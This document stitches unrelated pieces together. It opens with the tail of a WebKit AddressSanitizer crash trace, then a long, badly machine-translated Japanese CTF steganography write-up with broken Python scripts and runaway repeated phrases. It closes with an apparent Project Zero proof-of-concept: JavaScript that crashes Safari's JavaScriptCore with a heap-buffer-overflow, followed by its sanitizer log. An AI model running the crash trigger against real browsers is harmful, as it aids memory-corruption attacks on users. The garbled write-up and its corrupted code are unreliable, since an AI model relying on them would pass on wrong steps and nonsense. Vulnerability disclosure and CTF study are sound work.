#22 0x115be72b3 in WebCore::FrameLoader::loadWithDocumentLoader(WebCore::DocumentLoader*, WebCore::FrameLoadType, WTF::PassRefPtr<WebCore::FormState>, WebCore::AllowNavigationToInvalidURL) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa8b2b3)
#23 0x115be5de6 in WebCore::FrameLoader::loadWithNavigationAction(WebCore::ResourceRequest const&, WebCore::NavigationAction const&, WebCore::LockHistory, WebCore::FrameLoadType, WTF::PassRefPtr<WebCore::FormState>, WebCore::AllowNavigationToInvalidURL) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa89de6)
#24 0x115be2113 in WebCore::FrameLoader::loadURL(WebCore::FrameLoadRequest const&, WTF::String const&, WebCore::FrameLoadType, WebCore::Event*, WTF::PassRefPtr<WebCore::FormState>) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa86113)
#25 0x115be043c in WebCore::FrameLoader::loadURLIntoChildFrame(WebCore::URL const&, WTF::String const&, WebCore::Frame*) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa8443c)
#26 0x107e0ed25 in WebKit::WebFrameLoaderClient::createFrame(WebCore::URL const&, WTF::String const&, WebCore::HTMLFrameOwnerElement*, WTF::String const&, bool, int, int) (webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x626d25)
#27 0x117966328 in WebCore::SubframeLoader::loadSubframe(WebCore::HTMLFrameOwnerElement&, WebCore::URL const&, WTF::String const&, WTF::String const&) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x280a328)
#28 0x117964335 in WebCore::SubframeLoader::loadOrRedirectSubframe(WebCore::HTMLFrameOwnerElement&, WebCore::URL const&, WTF::AtomicString const&, WebCore::LockHistory, WebCore::LockBackForwardList) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x2808335)
#29 0x117963f47 in WebCore::SubframeLoader::requestFrame(WebCore::HTMLFrameOwnerElement&, WTF::String const&, WTF::AtomicString const&, WebCore::LockHistory, WebCore::LockBackForwardList) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x2807f47)
SUMMARY: AddressSanitizer: heap-use-after-free (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x7788a) in WTF::TypeCastTraits<WebCore::FrameView const, WebCore::ScrollView const, false>::isType(WebCore::Widget const&)
Shadow bytes around the buggy address:
0x1c3400018b00: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x1c3400018b10: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x1c3400018b20: fd fd fd fd fd fd fd fd fd fd fa fa fa fa fa fa
0x1c3400018b30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x1c3400018b40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x1c3400018b50:[fd]fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x1c3400018b60: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x1c3400018b70: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x1c3400018b80: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x1c3400018b90: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x1c3400018ba0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==54938==ABORTING
-->
1。フラグの提出形式
フラグ{th1s_!s_a_d4m0_4la9}
2。 PDFステガノグラフィ
writeup:オンラインワードを使用してPDFツールを使用してワードファイルに変換し、flag3https://App.xunjiepdf.com/pdf2word/StegSolveツールのフレームブラウザブラウザを使用して、静的画像ファイル形式のファイル形式を表示します。これは、主に画像の特定の情報を表示します。
データ抽出:データ抽出、写真の隠されたデータの抽出
フレームブラウザー:フレームブラウザーは、主にGIFなどのアニメーションを分解し、アニメーションが画像になり、簡単に表示されます。
画像combiner:パズル、画像ステッチ
2。 QRコードには、位置付けパターンと呼ばれる3つの小さな正方形がありませんが、QRコード長方形のサイズをマークするために使用されます。 3つの位置決めパターンを使用して、QRコード長方形の位置と方向を識別および決定できます。 3.静的画像のスクリーンショットを保存し、Phoshtopツールを使用してQRコード画像を修復してからスキャンします
https://jiema.wwei.cn/(QRコードオンライン識別ツール)
iii。 GIFピクチャーステガノグラフィ
writeup:
1. JD-GUIで開き、直接検索:フラグ
2。 base64を使用して、フラグを解読します{dajidali_jinwanchiji}
iv。 jar steganography
writeup:1。 WinHexを使用してこれらの写真を表示すると、利用可能な情報が見つかりませんでした。したがって、白黒はバイナリ0と1を表す可能性があると思いました。合計で104枚の写真があり、正確に8の倍数であり、8つの1バイナリシステムに変換してからASCIIコードに変換できます。たくさんの写真があるので、Pythonスクリプトを書きます。ここでは、Python Image Library PIL(Python Image Library)を使用します。これは、Python用のサードパーティ画像処理ライブラリです。 PILインポート画像から
結果=''
範囲(104):のIの場合
img=image.open(f'c: \\ users \\ backlion \\ desktop \\ ctf \\ jpg \\ gif \\ {i} .jpg ')
im_rgb=img.convert( 'rgb')#画像をRGBモードに変換する
r、g、b=im_rgb.getpixel((1,1))#xとy座標のRGB値をゲット
印刷(r、g、b)#この質問では、白い画像のRGB値:255,255,255ブラック画像RGB値:12,12,0
r!=255:#255が白の場合
結果+='1'
else:
結果+='0'
#バイナリをASCIIコードに変換します
範囲(0、len(result)、8):のiの場合
byte=result [i:i+8]
print(chr(int(byte、2))、end='')
'' '
rusult:
フラグ{fun_gif}
'' 2。オンラインバイナリから文字列http://www.txttool.com/wenben_binarystr.asp 
5。圧縮パッケージ暗号化された白黒写真
writeup:このメッセージは次のとおりです。 c8e9aca0c6f2e5f3e8c4efe7a1a0d4e8e5a0e6ece1e7a0e9f3baa0e8eafae3f9e4eafae2eae4e3eaebfaebe3f5e7e9f3e4e3e8eaf9eaf3e2e4e6f2writeup:1.この暗号化と復号化方法は非常に簡単に推測できます。文字は最大fであるため、16進数を推測するため、グループには2つあります。 2つのグループごとに、16進数を小数に変換します。データの各セットは127を超えていることがわかりますが、ASCIIコードの値は127以下ではないため、すべての値は128で差し引かれ、文字に変換され、フラグが取得されます。 string='c8e9aca0c6f2e5f3e8c4efe7a1a0d4e8e5a0e6ece1e7a0e9f3baa0e8eabae3f9e4eafae4e3eebfaebebebebebebebebebebebebe7e7e9f3e4e3e3e3e8ea893e2e4e4e6e6f2'
flag=''
範囲(0、len(string)、2):のiの場合
s='0x' + string [i] + string [i + 1]
flag +=chr(int(s、16)-128)
印刷(フラグ)2。取得:こんにちは、フレッシュドッグ!フラグは: hjzcydjzbjdcjkzkzkcugisdchjyjsbdfr注:jpocketknifeを使用して
6、ascii
の16進Writeup:1を変換することもできます。テキストは次のように表示されます:ye duo xi xi xi xi duo duo duo lu mu lu three nephews three、3番目のne、3番目は、3番目は3番目です。3番目は3番目です。3番目は3番目です。3番目は3番目です。3番目は3番目です。 3番目、3番目は、3番目は、3番目の1つ、3番目は3番目、3番目は3番目です。3番目は3番目です。3番目は3番目です。3番目は3番目です。 3番目、3番目は、3番目は、3番目は、3番目は3番目です。3番目は、3番目は3番目です。3番目は3番目です。3番目は3番目です。3番目は3番目です。 3番目は、3番目のもの、3番目のもの、3番目のものは、3番目のもの、3番目のものは、3番目は、3番目は3番目です。3番目は3番目です。私はti病でti病であるのではないかと心配しています。私はti病でti病です。私はti病でti病です。私はti病でti病です。私はti病でti病です。私はti病でti病です。私はti病でti病です。私はti病でti病です。私はti病でti病です。私はti病でti病です。私はti病でti病です。私はti病でti病です。私はti病でti病です。私はti病でti病です。私はti病でti病です。私はti病でti病です。私はti病でti病です。私はti病でti病です。私はti病でti病です。私はti病でti病です。私はti病でti病です。私はti病でti病です。私はti病でti病です。私はti病でti病です。私はti病でti病です。私はti病でti病です。私はti病でti病です。私はti病でti病です。私はti病でti病です。私はti病でti病です。私はti病でti病です。私はti病でti病です。私はti病でti病です。私はti病でti病です。私はti病でti病です。私はti病でti病です。私はti病でti病です。私はti病でti病です。私はti病でti病です。私はti病でti病です。私はti病でti病です。私はti病でti病です。私はti病でti病です。私はti病でti病です。私はti病でti病です。私はti病でti病です。私はti病でti病です。私はti病でti病です。私はti病でti病です。私はti病です
2。仏の言葉の意味は、オンライン翻訳ツールhttp://www.keyfc.net/bbs/tools/tudoucode.aspx:
3を介して復号化できます。次に、復号化されたmzkum3gvmuawnzuvn3cgozmlmtuvqzaenjchmuaeqzwenzemljw9は、rot-13ツールを使用します(タイトルに記載されている「タタガタの13ヤシ」に従って)。
zmxhz3tizhnjamhia3ptbmzyzghidmnrawpuzhnrdmjramrzywj9を取得します
https://ROT13.com/(オンラインツール)Python Decryption:#Coding:UTF-8
文字列をインポートします
defデコーダー(crypt_str、shift):
crypt_list=list(crypt_str)
Plain_str=''
num=int(shift)
crypt_list:のChの場合
ch=ord(ch)
if ord( 'a')=chおよびch=ord( 'z'):
ch=ch + num
ch ord( 'z'):の場合
ch-=26
if ord( 'a')=chおよびch=ord( 'z'):
ch=ch +num
ch ord( 'z'):の場合
ch-=26
a=chr(ch)
Plain_str +=a
print(plain_str)
crypt_str=raw_input( 'crypto_text:')
印刷'!-------デコード------!'
シフト=13
Decoder(crypt_str、shift)注:rot13は、単純な交換エンタープライプアルゴリズムを使用して、最初の文字と最後の13文字を合成します。
4。Base64復号化
flag {bdscjhbkzmnfrdhbvvckijndskvbkjdsab}
7。仏を仏buddhで解読します
writeup:1。 Google Chromeを介してPDFファイルを開き、テキストコンテンツをテキストにコピーします
baba Bbb ba bba ba ba ba ba b aab bbb ba aaaaaaaaaaaaaaabbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb baaaaaaaaaaaaaaabbb aaabb2。 Aababaスタイルのものの大部分は01だと思いますが、これらは分割されており、Mossパスワードのみを考えることができるため、Mossパスワードに変更しようとします。次に、「a」を「」、「b」に「 - 」に変更し、get -.--を変更します。 - 。 --.-- --.-- --.-- --.-- --.-- --.-- --.-- --.-- --.-- --.-- --.-- --.-- --.-- --.-- --.-- --.-- --.-- --.-- --.-- --.-- --.-- --..-- --..-- --...-- --...............................
CONGRATULATIONSnullFLAGnull1NV151BL3M3554G34.変換:Flagnull後に内容を取り、Letterを小文字に変更し、フォーマットフラグ{1NV151BL3M3554G3}を下位ケースに変換します:Flag {1NV151BL3M3554G3}
8。 PDFのMOMOSパスワードSteganography
基本知識:1。一般的なファイルヘッドおよびファイルテール構造:
WRITEUP:1。この場所はファイルヘッダーを表し、65はflag.txtのファイルの終わりです。a83cは検証コードを表します。したがって、7cはブロックタイプを表します。ここでは、ブロックタイプはファイルヘッダーです。
2。 7bを入力して、74。
3に変更してください。保存して減圧してから、Sercet.pngをWinHexに投げて、ファイルヘッダーがGIF画像であることを確認し、接尾辞名を.gifに変更します。
通常のファイルエンコードに関する知識は次のとおりです。
JPG画像開始フラグ:FF D8エンドフラグ:FF D9
GIF画像開始フラグ:47 49 46 38 39 61エンドフラグ:01 01 00 3B
4。接尾辞名を.gifとして変更し、Stegsolveのフレームブラウザを使用して2つの写真に分解し、左と右の矢印を使用してレイヤーを選択してQRコードを分離して2つの不完全なQRコードを取得します。
5。質問から、二重層の絵であることがわかります。 PSを使用して分離されたレイヤーを開き、保存します
(特定の手順:レイヤーをクリックします - レイヤーをコピー - OK、次にファイルをクリック - 保存- 保存)
PSフルQRコード、スキャンしてフラグを取得する:flag {yanji4n_bu_we1shi}
6.オンラインPSツール:https://www.uupoop.com/ps/?hmsr=ps_menu(——色の範囲を選択し、1が表示できるQRコードに色域を調整してからスプライスします)
9。破損したRARファイルのGIFステガノグラフィ
基本知識:1。ソースファイルデータ領域を圧縮します:
50 4b 03 04:これはヘッダーファイルタグ(0x04034b50)です
14 03:ファイルの減圧の必要なpkwareバージョン
00 00:グローバルモードビットマーク(暗号化があるかどうかを判断するための重要なマーク)
08 00:圧縮方法
68 BF:最後の変更されたファイル時間
9b 48:最終変更されたファイル日付
Fe 32 7d 4b:CRC-32検証
E9 0D 00 00:圧縮後のサイズ
B5 1B 00 00:圧縮されていないサイズ
09 00:ファイル名の長さ
00 00:拡張レコード長
2。ソースファイルディレクトリ領域を圧縮します。
50 4b 01 02:ディレクトリのファイルヘッダータグ(0x02014b50)
3F 03:圧縮に使用されるPKwareバージョン
14 03:ファイルの減圧の必要なpkwareバージョン
00 00:グローバルモードビットマーク(暗号化に重要な兆候があるかどうか、この変更はここで擬似暗号化のために行われ、09 00に変更して開きます。パスワードがあることが促されます)
08 00:圧縮方法
68 BF:最後の変更されたファイル時間
9b 48:最終変更されたファイル日付
Fe 32 7d 4b:CRC-32検証(1480b516)
E9 0D 00 00:圧縮サイズ(25)
B5 1B 00 00:圧縮されていないサイズ(23)
09 00:ファイル名の長さ
24 00:拡張フィールド長
00 00:ファイルコメントの長さ
00 00:ディスク開始番号
00 00:内部ファイル属性
20 80 ED 81:外部ファイル属性
00 00 00:ローカルヘッドオフセット
圧縮ソースファイルディレクトリエンドフラグ:
50 4b 05 06:ディレクトリエンドタグ
00 00:現在のディスク番号
00 00:ディレクトリ領域はディスク番号を開始します
01 00:このディスクに記録された総数
01 00:カタログエリアの合計記録
5B 00 00 00:ディレクトリエリアサイズ
10 0E 00 00:ディレクトリ領域の最初のディスクへのオフセット
00 00:zipファイルコメントの長さ
次に、真と偽の暗号化を特定します
1.暗号化なし
圧縮されたソースファイルデータ領域のグローバル暗号化は00 00でなければなりません
圧縮ソースファイルディレクトリ領域のグローバルビットマークは00 00でなければなりません
2。偽の暗号化
圧縮されたソースファイルデータ領域のグローバル暗号化は00 00でなければなりません
圧縮ソースファイルディレクトリ領域のグローバルビットマークは09 00でなければなりません
3。真の暗号化
圧縮されたソースファイルデータ領域のグローバル暗号化は09 00でなければなりません
圧縮ソースファイルディレクトリ領域のグローバルビットマークは09 00WRITEUP:でなければなりません
1.グローバルな問題は00 00ですが、最後には09 00であるため、偽の暗号化です。 09 00から00 00を変更すると、ファイルを減圧して開くことができます。
2。 zipcenop.jarツールjava-jarzipcenop.jarrxxx.zip 
を介してそれを復号化します。 TXTファイルを開くと、Base64パスワードがたくさん表示されますu3rlz2fub2dyyxboesbpcyb0agugyxj0igfuzcbzy2llbmnlig9mihdyaxrpbmcgaglkzgvuig1lc3nhz2vzigluihn1y2ggysb3yxk gdghhdcbubybvbmv=lcbhcgfydcbmcmcm9tihrozsbzzwkzxigyw5kigludgvuzgvkihjly2lwawvudcwgc3vzcgu=y3rzihrozsbleglgl zdgvuy2ugb2ygdghlig1lc3m=ywdllcbhigzvcm0gb2ygc2vjdxjpdhkgdghyb3vnacbvynnnjdxjpdhkuifs=agugd29yzcbzdgvn. yzwvrig9yawdpbibhbmqgbwvhbnmgimnvbmnlyw==bgvkihdyaxrpbmciigzyb20gdghliedyzwvrihdvcmrzihn0zwdhbm9zig1lyw5pbmcgimnvdmvyzwqgb3ig chjvdgvjdgvkiwgyw5kigdyyxbozwluig1lyw5pbmcginrvihc=cmml0zsiuifrozsbmaxjzdcbyzwnvcmrlzcb1c2ugb2ygdghlihrlcm0d2ffzigluide0otk gynkgsm9oyw5uzxmgvhjpdghlbwl1cybpbiboaxmgu3rlz2fub2dboawesigdhjlyv==dglzsbvvbibjcnlwdg9ncmfwahkgyw5kihn0zwdhbm9ncmfwhkggz glzz8==dwlzzwqgyxmgybibib29rig9uig1hz2ljlibhzw5lcmfsbhksig1lc3p=ywdlcyb3awxsigfwcgvhcib0bybizsbzb21ldghpbmcgzwxzogaw1hz2vzlc bhcnrpy2xlcywgc2hvchbpbmcgbglzdhmsig9yihnvbwugb3r=agvyignvdmvydgv4dcbhbmqsignsyxnzawnhhbgx5lcb0agugaglkzgvuig1lc3nhz2ugbwf5igj
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1098
I confirmed the PoC crashes the release version of Safari 10.0.3(12602.4.8).
(It might need to refresh the page several times.)
PoC:
-->
(function (x = 0) {
var a;
{
function arguments() {
}
function b() {
var g = 1;
a[5];
}
f();
g();
}
}());
<!--
Asan Log:
==55079==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60c0000c8e88 at pc 0x00010c30506a bp 0x7fff58fae860 sp 0x7fff58fae858
READ of size 8 at 0x60c0000c8e88 thread T0
#0 0x10c305069 in JSC::SymbolTableEntry::isWatchable() const (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x1671069)
#1 0x10c304f40 in JSC::SymbolTableEntry::prepareToWatch() (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x1670f40)
#2 0x10b2bd728 in JSC::CodeBlock::finishCreation(JSC::VM&, JSC::ScriptExecutable*, JSC::UnlinkedCodeBlock*, JSC::JSScope*) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x629728)
#3 0x10c290c73 in JSC::FunctionCodeBlock::create(JSC::VM*, JSC::FunctionExecutable*, JSC::UnlinkedFunctionCodeBlock*, JSC::JSScope*, WTF::PassRefPtr<JSC::SourceProvider>, unsigned int, unsigned int) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x15fcc73)
#4 0x10c2901ea in JSC::ScriptExecutable::newCodeBlockFor(JSC::CodeSpecializationKind, JSC::JSFunction*, JSC::JSScope*, JSC::JSObject*&) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x15fc1ea)
#5 0x10c29182a in JSC::ScriptExecutable::prepareForExecutionImpl(JSC::VM&, JSC::JSFunction*, JSC::JSScope*, JSC::CodeSpecializationKind, JSC::CodeBlock*&) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x15fd82a)
#6 0x10bf2c921 in JSC::LLInt::setUpCall(JSC::ExecState*, JSC::Instruction*, JSC::CodeSpecializationKind, JSC::JSValue, JSC::LLIntCallLinkInfo*) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x1298921)
#7 0x10bf3b9ce in llint_entry (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12a79ce)
#8 0x10bf34faa in vmEntryToJavaScript (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12a0faa)
#9 0x10bbf7d1d in JSC::JITCode::execute(JSC::VM*, JSC::ProtoCallFrame*) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0xf63d1d)
#10 0x10bb80c6d in JSC::Interpreter::execute(JSC::ProgramExecutable*, JSC::ExecState*, JSC::JSObject*) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0xeecc6d)
#11 0x10b371316 in JSC::evaluate(JSC::ExecState*, JSC::SourceCode const&, JSC::JSValue, WTF::NakedPtr<JSC::Exception>&) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x6dd316)
#12 0x10b37151e in JSC::profiledEvaluate(JSC::ExecState*, JSC::ProfilingReason, JSC::SourceCode const&, JSC::JSValue, WTF::NakedPtr<JSC::Exception>&) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x6dd51e)
#13 0x116201743 in WebCore::JSMainThreadExecState::profiledEvaluate(JSC::ExecState*, JSC::ProfilingReason, JSC::SourceCode const&, JSC::JSValue, WTF::NakedPtr<JSC::Exception>&) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x24f5743)
#14 0x1162012b4 in WebCore::ScriptController::evaluateInWorld(WebCore::ScriptSourceCode const&, WebCore::DOMWrapperWorld&, WebCore::ExceptionDetails*) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x24f52b4)
#15 0x116214881 in WebCore::ScriptElement::executeClassicScript(WebCore::ScriptSourceCode const&) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x2508881)
#16 0x116211943 in WebCore::ScriptElement::prepareScript(WTF::TextPosition const&, WebCore::ScriptElement::LegacyTypeSupport) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x2505943)
#17 0x114a13b5c in WebCore::HTMLScriptRunner::runScript(WebCore::Element*, WTF::TextPosition const&) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xd07b5c)
#18 0x114a13895 in WebCore::HTMLScriptRunner::execute(WTF::PassRefPtr<WebCore::Element>, WTF::TextPosition const&) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xd07895)
#19 0x11493fc35 in WebCore::HTMLDocumentParser::runScriptsForPausedTreeBuilder() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc33c35)
#20 0x114940372 in WebCore::HTMLDocumentParser::pumpTokenizerLoop(WebCore::HTMLDocumentParser::SynchronousMode, bool, WebCore::PumpSession&) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc34372)
#21 0x11493f544 in WebCore::HTMLDocumentParser::pumpTokenizer(WebCore::HTMLDocumentParser::SynchronousMode) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc33544)
#22 0x114940f9d in WebCore::HTMLDocumentParser::append(WTF::RefPtr<WTF::StringImpl>&&) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc34f9d)
#23 0x1143a3df1 in WebCore::DecodedDataDocumentParser::flush(WebCore::DocumentWriter&) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x697df1)
#24 0x1144d3118 in WebCore::DocumentWriter::end() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x7c7118)
#25 0x11449622f in WebCore::DocumentLoader::finishedLoading(double) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x78a22f)
#26 0x113f73b77 in WebCore::CachedResource::checkNotify() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x267b77)
#27 0x113f6d709 in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x261709)
#28 0x11651ea04 in WebCore::SubresourceLoader::didFinishLoading(double) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x2812a04)
#29 0x1075ef6b5 in WebKit::WebResourceLoader::didFinishResourceLoad(double) (webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x9886b5)
#30 0x1075f2965 in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(double)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(double)) (webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x98b965)
#31 0x1075f1f8a in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x98af8a)
#32 0x106f3c639 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x2d5639)
#33 0x106d17088 in IPC::Connection::dispatchMessage(std::__1::unique_ptr<IPC::Decoder, std::__1::default_delete<IPC::Decoder> >) (webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0xb0088)
#34 0x106d206b4 in IPC::Connection::dispatchOneMessage() (webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0xb96b4)
#35 0x10c514653 in WTF::RunLoop::performWork() (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x1880653)
#36 0x10c514ebe in WTF::RunLoop::performWork(void*) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x1880ebe)
#37 0x7fff9373e980 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_SOURCE0_PERFORM_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0xa7980)
#38 0x7fff9371fa7c in __CFRunLoopDoSources0 (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0x88a7c)
#39 0x7fff9371ef75 in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0x87f75)
#40 0x7fff9371e973 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0x87973)
#41 0x7fff92caaacb in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox+0x30acb)
#42 0x7fff92caa900 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox+0x30900)
#43 0x7fff92caa735 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox+0x30735)
#44 0x7fff91250ae3 in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x46ae3)
#45 0x7fff919cb21e in -[NSApplication(NSEvent) _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x7c121e)
#46 0x7fff91245464 in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x3b464)
#47 0x7fff9120fd7f in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x5d7f)
#48 0x7fffa8edb8c6 in _xpc_objc_main (/usr/lib/system/libxpc.dylib+0x108c6)
#49 0x7fffa8eda2e3 in xpc_main (/usr/lib/system/libxpc.dylib+0xf2e3)
#50 0x106c4bb73 in main (webkit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development+0x100001b73)
#51 0x7fffa8c77254 in start (/usr/lib/system/libdyld.dylib+0x5254)
0x60c0000c8e88 is located 8 bytes to the right of 128-byte region [0x60c0000c8e00,0x60c0000c8e80)
allocated by thread T0 here:
#0 0x109508bf0 in wrap_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.0.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib+0x4abf0)
#1 0x10c55a01e in bmalloc::Allocator::allocateSlowCase(unsigned long) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x18c601e)
#2 0x10c4f5535 in bmalloc::Allocator::allocate(unsigned long) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x1861535)
#3 0x10b257f38 in WTF::HashTable<WTF::RefPtr<WTF::UniquedStringImpl>, WTF::KeyValuePair<WTF::RefPtr<WTF::UniquedStringImpl>, JSC::SymbolTableEntry>, WTF::KeyValuePairKeyExtractor<WTF::KeyValuePair<WTF::RefPtr<WTF::UniquedStringImpl>, JSC::SymbolTableEntry> >, JSC::IdentifierRepHash, WTF::HashMap<WTF::RefPtr<WTF::UniquedStringImpl>, JSC::SymbolTableEntry, JSC::IdentifierRepHash, WTF::HashTraits<WTF::RefPtr<WTF::UniquedStringImpl> >, JSC::SymbolTableIndexHashTraits>::KeyValuePairTraits, WTF::HashTraits<WTF::RefPtr<WTF::UniquedStringImpl> > >::allocateTable(unsigned int) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x5c3f38)
#4 0x10b257df1 in WTF::HashTable<WTF::RefPtr<WTF::UniquedStringImpl>, WTF::KeyValuePair<WTF::RefPtr<WTF::UniquedStringImpl>, JSC::SymbolTableEntry>, WTF::KeyValuePairKeyExtractor<WTF::KeyValuePair<WTF::RefPtr<WTF::UniquedStringImpl>, JSC::SymbolTableEntry> >, JSC::IdentifierRepHash, WTF::HashMap<WTF::RefPtr<WTF::UniquedStringImpl>, JSC::SymbolTableEntry, JSC::IdentifierRepHash, WTF::HashTraits<WTF::RefPtr<WTF::UniquedStringImpl> >, JSC::SymbolTableIndexHashTraits>::KeyValuePairTraits, WTF::HashTraits<WTF::RefPtr<WTF::UniquedStringImpl> > >::rehash(unsigned int, WTF::KeyValuePair<WTF::RefPtr<WTF::UniquedStringImpl>, JSC::SymbolTableEntry>*) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x5c3df1)
